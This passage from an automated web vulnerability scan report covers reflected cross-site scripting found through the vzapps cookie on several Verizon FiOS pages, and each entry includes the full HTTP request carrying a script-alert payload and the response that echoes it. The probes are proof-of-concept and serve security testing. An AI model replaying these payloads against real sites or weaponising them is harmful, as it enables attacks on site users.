Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX56c4c'><script>alert(1)</script>277bd852140; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX56C4C'><SCRIPT>ALERT(1)</SCRIPT>277BD852140 ' />
...[SNIP]...

3.152. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload fc928<script>alert(1)</script>80e25040c4e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXfc928<script>alert(1)</script>80e25040c4e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117564
Expires: Sat, 20 Nov 2010 00:11:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=TXfc928<script>alert(1)</script>80e25040c4e; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXFC928<SCRIPT>ALERT(1)</SCRIPT>80E25040C4E </DIV>
...[SNIP]...

3.153. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8b99'><script>alert(1)</script>47fb54bb178 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb8b99'><script>alert(1)</script>47fb54bb178; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69367
Expires: Sat, 20 Nov 2010 00:13:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=TXb8b99'><script>alert(1)</script>47fb54bb178; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB8B99'><SCRIPT>ALERT(1)</SCRIPT>47FB54BB178 ' />
...[SNIP]...

3.154. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab07d<script>alert(1)</script>4c69398d6d5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab07d<script>alert(1)</script>4c69398d6d5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69363
Expires: Sat, 20 Nov 2010 00:14:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=TXab07d<script>alert(1)</script>4c69398d6d5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAB07D<SCRIPT>ALERT(1)</SCRIPT>4C69398D6D5 </DIV>
...[SNIP]...

3.155. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f710f'><script>alert(1)</script>e2fd98d03b8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXf710f'><script>alert(1)</script>e2fd98d03b8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57182
Expires: Sat, 20 Nov 2010 00:09:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf710f'><script>alert(1)</script>e2fd98d03b8; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF710F'><SCRIPT>ALERT(1)</SCRIPT>E2FD98D03B8 ' />
...[SNIP]...

3.156. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 72540<script>alert(1)</script>7d82b6fd3cc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX72540<script>alert(1)</script>7d82b6fd3cc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69784
Expires: Sat, 20 Nov 2010 00:12:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX72540<script>alert(1)</script>7d82b6fd3cc; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX72540<SCRIPT>ALERT(1)</SCRIPT>7D82B6FD3CC </DIV>
...[SNIP]...

3.157. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 217f0'><script>alert(1)</script>c757f2d9905 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX217f0'><script>alert(1)</script>c757f2d9905; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69788
Expires: Sat, 20 Nov 2010 00:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:10 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX217f0'><script>alert(1)</script>c757f2d9905; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX217F0'><SCRIPT>ALERT(1)</SCRIPT>C757F2D9905 ' />
...[SNIP]...

3.158. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8f35d<script>alert(1)</script>666a41a49d0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8f35d<script>alert(1)</script>666a41a49d0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 114983
Expires: Sat, 20 Nov 2010 00:10:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8f35d<script>alert(1)</script>666a41a49d0; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8F35D<SCRIPT>ALERT(1)</SCRIPT>666A41A49D0 </DIV>
...[SNIP]...

3.159. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77bd6'><script>alert(1)</script>866fecce315 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX77bd6'><script>alert(1)</script>866fecce315; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 113390
Expires: Sat, 20 Nov 2010 00:09:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX77bd6'><script>alert(1)</script>866fecce315; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX77BD6'><SCRIPT>ALERT(1)</SCRIPT>866FECCE315 ' />
...[SNIP]...

3.160. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78bda'><script>alert(1)</script>c540e06163e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX78bda'><script>alert(1)</script>c540e06163e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75663
Expires: Sat, 20 Nov 2010 00:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX78bda'><script>alert(1)</script>c540e06163e; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX78BDA'><SCRIPT>ALERT(1)</SCRIPT>C540E06163E ' />
...[SNIP]...

3.161. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6e62f<script>alert(1)</script>a74e7065845 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6e62f<script>alert(1)</script>a74e7065845; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75659
Expires: Sat, 20 Nov 2010 00:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX6e62f<script>alert(1)</script>a74e7065845; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6E62F<SCRIPT>ALERT(1)</SCRIPT>A74E7065845 </DIV>
...[SNIP]...

3.162. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e17ad'><script>alert(1)</script>33b4d098683 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

